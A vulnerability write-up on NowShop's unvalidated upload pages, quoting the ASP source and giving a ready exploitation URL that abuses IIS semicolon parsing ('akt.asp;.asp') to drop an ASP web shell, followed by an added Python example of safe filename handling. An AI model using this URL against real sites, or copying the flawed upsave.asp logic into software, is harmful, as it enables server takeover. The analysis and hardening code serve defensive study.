NowShop: direct upload gets a shell

2010, April 8, 6:33 PM. Vulnerability analysis
Submitted by admin

The vulnerability is in the upload.asp page, which performs no validation at all:
<!--#include file="../include/nowshop.asp"-->
<%
session("fuptype")=request("fuptype")  
session("fupname")=request("fupname")  
session("frmname")=request("frmname")  
Server.ScriptTimeOut=99999
%>
<html>
<head>
<title>文件上传</title>
<meta name="Description" Content="">
<LINK href="../images/css.css" type=text/css rel=stylesheet>
<LINK href="../list/newhead.css" type=text/css rel=stylesheet>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"></head>
<body bgcolor="#D9EAFC">
<table align="left"><tr><td>
<form name="form1" method="post" action="upsave.asp" enctype="multipart/form-data"> <!-- still submits to upsave.asp -->
<b>请选择要上传的文件:</b><br>
<input type=file name="file1">
<input type=submit name="submit" value="上传"><br><br>
...
</html>

Now look at upsave.asp: still no validation. Some versions do add a file restriction, but combined with that IIS parsing issue it works perfectly.
if file.fileSize>0 then
    filename=fupname+"."                                            ' this is the spot: fupname comes straight from the request
    filenameend=file.filename
    filenameend=split(filenameend,".")
    n=UBound(filenameend)
    filename=filename&filenameend(n)                                ' only the last piece of the uploaded name is appended
    if fuptype<>"db" then                                           ' the size check is skipped entirely for fuptype=db
        if file.fileSize>200000 then
            response.write "<script language='javascript'>"
            response.write "alert('您上传的文件太大,上传不成功,单个文件最大不能超过200K!');"
            response.write "location.href='javascript:history.go(-1)';"
            response.write "</script>"
            response.end
        end if
    end if
    if fuptype="adv" or fuptype="pic" then                          ' the extension check only applies to adv and pic
        if LCase(filenameend(n))<>"gif" and LCase(filenameend(n))<>"jpg" and LCase(filenameend(n))<>"swf" and LCase(filenameend(n))<>"htm" then
            response.write "<script language='javascript'>"
            response.write "alert('不允许上传您选择的文件格式,请检查后重新上传!');"
            response.write "location.href='javascript:history.go(-1)';"
            response.write "</script>"
            response.end
        end if
    end if
    if fuptype="adv" then
        savepath="../images/adv/"&filename
    elseif fuptype="pic" then
        savepath="../pic/digi/"&filename
    elseif fuptype="pic1" then
        savepath="../pic/digi1/"&filename
    elseif fuptype="link" then
        savepath="../images/links/"&filename
    elseif fuptype="db" then
        savepath="./"&filename                                      ' db uploads land in the current (admin) directory
    end if
    ' (remainder of upsave.asp not quoted)
end if
The exploitation page is below:
http://127.0.0.1/admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp
Here akt.asp;.asp makes use of the IIS parsing vulnerability.
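The root cause above is that the stored filename is built from request-controlled input (fupname) plus the last dot-separated piece of the uploaded name, with the size and extension checks applied only to some upload types. The following is an added example of how a defender would derive the stored name instead; it is not NowShop code and not from the original post. It reproduces the original derivation for comparison, then shows a version that ignores the request-supplied name, uses a random token as the base, enforces the size limit for every type, and allowlists the extension per type. The allowlists, directory paths, the 200000-byte limit reused from the page, and the function names are assumptions made for this example.

```python
import os
import re
import secrets

# Allowlist per upload type (constructed for this example; it mirrors the
# gif/jpg/swf check in upsave.asp but drops htm and gives the "db" type its
# own list instead of no check at all).
ALLOWED_EXT = {
    "adv":  {"gif", "jpg", "swf"},
    "pic":  {"gif", "jpg", "swf"},
    "pic1": {"gif", "jpg"},
    "link": {"gif", "jpg"},
    "db":   {"mdb"},
}
# Storage directories (constructed). Uploads should live where the web server
# does not execute scripts, unlike the "./" the original uses for db.
SAVE_DIRS = {
    "adv":  "/var/uploads/adv",
    "pic":  "/var/uploads/pic",
    "pic1": "/var/uploads/pic1",
    "link": "/var/uploads/link",
    "db":   "/var/uploads/db",
}
MAX_BYTES = 200000  # the page's 200K limit, here applied to every type, db included
EXT_RE = re.compile(r"[a-z0-9]{1,5}")  # an extension is short and alphanumeric only


class UploadRejected(ValueError):
    """Raised when an upload fails a server-side check."""


def vulnerable_stored_name(fupname: str, uploaded_name: str) -> str:
    """Reproduces the derivation in upsave.asp: the request-supplied fupname
    becomes the base name and only the last '.'-separated piece of the
    uploaded name is appended, so the base itself is never inspected."""
    return fupname + "." + uploaded_name.split(".")[-1]


def safe_stored_name(fuptype: str, uploaded_name: str, size: int, token: str = None) -> str:
    """Derive a stored filename that never contains request-controlled text.

    The base is a random token (or the caller-supplied one, for tests); the
    extension must be a plain alphanumeric string in the type's allowlist.
    A name such as 'akt.asp;.asp' never reaches disk in any form.
    """
    if fuptype not in ALLOWED_EXT:
        raise UploadRejected("unknown upload type")
    if size <= 0 or size > MAX_BYTES:
        raise UploadRejected("size out of range")
    # Strip any directory component the client may have sent.
    base = os.path.basename(uploaded_name.replace("\\", "/"))
    parts = base.rsplit(".", 1)
    if len(parts) != 2:
        raise UploadRejected("no extension")
    ext = parts[1].lower()
    if not EXT_RE.fullmatch(ext) or ext not in ALLOWED_EXT[fuptype]:
        raise UploadRejected("extension %r not allowed for %s" % (ext, fuptype))
    token = token if token is not None else secrets.token_hex(8)
    return "%s.%s" % (token, ext)


def stored_path(fuptype: str, name: str) -> str:
    """Join the upload directory and name, refusing anything that escapes it."""
    base = os.path.normpath(SAVE_DIRS[fuptype])
    path = os.path.normpath(os.path.join(base, name))
    if os.path.dirname(path) != base:
        raise UploadRejected("path escapes upload directory")
    return path


def accepted(fuptype: str, uploaded_name: str, size: int) -> bool:
    """Convenience wrapper: True if the upload passes every check."""
    try:
        safe_stored_name(fuptype, uploaded_name, size, token="t")
        return True
    except UploadRejected:
        return False


if __name__ == "__main__":
    # The request from the page: fuptype=db, fupname=akt.asp;.asp, with a
    # constructed uploaded name. The original derivation keeps the request
    # text; the hardened one rejects the upload outright.
    print("original:", vulnerable_stored_name("akt.asp;.asp", "shell.asp"))
    print("hardened accepts db/shell.asp:", accepted("db", "shell.asp", 1000))
    print("hardened accepts pic/photo.JPG:", accepted("pic", "photo.JPG", 1000))
```

Note that the hardened version does not try to sanitise the request-supplied name at all; it simply never uses it. Whatever the web server's parsing quirks, the on-disk name is a hex token plus an allowlisted extension, and the size check cannot be skipped by choosing a different fuptype.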

Tags: nowshop
